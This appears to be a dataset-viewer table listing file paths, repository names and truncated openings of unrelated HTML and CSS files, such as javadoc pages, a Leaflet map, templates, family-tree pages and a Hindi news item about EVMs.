solr-5.4.0/docs/solr-core/org/apache/solr/highlight/package-frame.html | jmmnn/linksSDGs | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_45) on Fri Dec 04 23:17:12 GMT 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>org.apache.solr.hig... |
ScriptReference/AudioReverbPreset.ParkingLot.html | rakuten/Uinty3D-Docs-zhcn | <!DOCTYPE html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Unity - Scripting API: AudioReverbPreset.ParkingLot</title>
<meta n... |
index.html | ackuser/leaflet-spain-geojson | <html>
<head>
<title>A Leaflet map!</title>
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.css"/>
<script src="http://cdn.leafletjs.com/leaflet-0.7.3/leaflet.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.4/jquery.js"></script>
<style>
#map{ height:... |
FacewhatFire/documentation/docs/javadoc/org/jivesoftware/openfire/launcher/package-frame.html | masach/FaceWhat | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_111) on Thu Dec 01 14:02:06 UTC 2016 -->
<title>org.jivesoftware.openfire.launcher (Openfire 4.0.4 Javadoc)</title>
<meta name="date" content="... |
java_methods_profiler/javaassist/javassist-3.16.1-GA/html/javassist/bytecode/BadBytecode.html | ilagunap/process-profiler | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_29) on Wed Mar 07 01:58:06 JST 2012 -->
<TITLE>
BadBytecode (Javassist API)
</TITLE>
<META NAME="date" CONTENT="2012-03-07">
<LINK REL ="stylesheet... |
ext/fatfs-0.8b-patched/fatfs/doc/ja/sfatfs.html | EmbeddedFiedel/Quadrocopter_F407_MPU6050 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="ja">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<meta http-equiv="Content-Style-Type" content="text/css">
<link rel="up" title="FatFs" href="../00index_j.html">
<link rel="alt... |
marmix/templates/simulations/includes/teams_table.html | HEG-Arc/marmix | <table class="table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Holdings</th>
<th>Status</th>
<th>Registration key</th>
<th>Members</th>
</tr>
</thead>
<tbody>
{% for team in teams %}
<tr>
<td>{{ team.name... |
cloud-shop/src/main/webapp/test.html | rock007/cloud-starter | <!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>demo</title>
<link href="/resources/plugins/bootstrap/bootstrap.min.css" rel="stylesheet">
<link href="/resources/plugins/bootst... |
_site/project/apotheek-waarschoot/index.html | youonly/youonly.github.io | <!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Apotheek Waarschoot</title>
<meta name="description" content="Renovatie van een apotheker in Waarschoot door HosteVanhee.">
<meta name="viewport" content="width=device-width, initial-sc... |
doc/index-files/index-4.html | tylerstacey/fiech-land | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_45) on Fri Nov 22 15:28:47 NST 2013 -->
<TITLE>
D-Index
</TITLE>
<META NAME="date" CONTENT="2013-11-22">
<LINK REL ="stylesheet" TYPE="text/css" HR... |
exercises/exercise01/exercise01/libraries/Sprites/reference/help-doc.html | Ahipsagh/cart253 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_71) on Thu Nov 12 16:14:19 GMT 2015 -->
<title>API Help (Javadocs: Sprites)</title>
<meta name="date" content="2015-11-12">
<link rel="... |
doc/gio-2.0/GLib.Proxy.html | themightyug/ledborg-server | <?xml version="1.0" encoding="utf-8"?>
<html>
<head>
<title>GLib.Proxy -- Vala Binding Reference</title>
<link href="../style.css" rel="stylesheet" type="text/css"/><script src="../scripts.js" type="text/javascript">
</script>
</head>
<body>
<div class="site_header">GLib.Proxy Reference Manual</di... |
public/stylesheets/index.css | cazro/navapp | ::-webkit-scrollbar {
display: none;
}
html,body{
background-color:black;
height: 100%;
}
#headerText{
color:#81b935;
}
#slideName{
color:#DDD;
}
.time{
color:#DDD;
}
.slide{
height:100%;
}
.weather{
display:block;
width:100%;
height:40vh;
background-size:110% !important;
background-posi... |
plugins-dist/sites/formulaires/exporter_sites.html | RadioCanut/site-radiocanut | <div class="formulaire_spip formulaire_exporter formulaire_#FORM">
<h3 class="titrem"><:sites:titre_exporter_bookmarks:></h3>
[<p class="reponse_formulaire reponse_formulaire_ok">(#ENV**{message_ok})</p>]
[<p class="reponse_formulaire reponse_formulaire_erreur">(#ENV*{message_erreur})</p>]
[(#ENV{editable})
<p cla... |
RossFamilyTree/evt/3/8/d15f60ae95c55cf158629ffa383.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Events</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mo... |
www/games/tir.html | 7Flow/Portfolio2016 | <!DOCTYPE html>
<html lang="fr">
<head>
</head>
<body style="margin: 0; padding: 0;">
<main>
<object width="550" height="411" id="popin-game" type="application/x-shockwave-flash" data="swf/kelloggs/game_shoot.swf"></object>
</main>
</body>
</html> |
RossFamilyTree/repo/0/4/d15f60eb7dc6fe758f99784b440.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Repositories</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="ap... |
modules/mailalerts/mails/ar/customer_qty.html | FranticFood/PS-Deli | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
<title>Mess... |
gui/event.nomoreparticipants.html | WikimediaChile/inscripcion | <div class="column">
<div class="ui large message">
<div class="header">
Inscripción cerrada
</div>
<p>Debido a la capacidad física del lugar donde nos reuniremos, no podemos seguir recibiendo más inscripciones..</p>
<check if="{{@event->evt_website}}">
<p>Si ... |
GWTUMLDrawer/doc/com/objetdirect/gwt/umlapi/client/artifacts/class-use/RelationLinkCompositionArtifact.html | RaphaelBrugier/gwtuml | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_12) on Fri Apr 10 15:31:10 CEST 2009 -->
<TITLE>
Uses of Class com.objetdirect.gwt.umlapi.client.artifacts.RelationLinkCompositionArtifact
</TITLE>
... |
Doc/html/search/functions_75.html | mogreet/iosSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search... |
_source/news/2017-04-10-evm.html | InstantKhabar/_source | ---
title: "EVM मुद्दे पर अब सर्वदलीय बैठक बुलाएगा चुनाव आयोग"
layout: item
category: ["india"]
date: 2017-04-10T14:14:55.365Z
image: 1491833695364evm.jpg
---
<p>नई दिल्ली: चुनाव आयोग ने हाल में संपन्न हुए चुनावों में इलेक्ट्रॉनिक वोटिंग मशीनों (ईवीएम) में कथित गड़बड़ियों के मुद्दे पर 16 विपक्षी दलों की मांग के मद्देनज... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.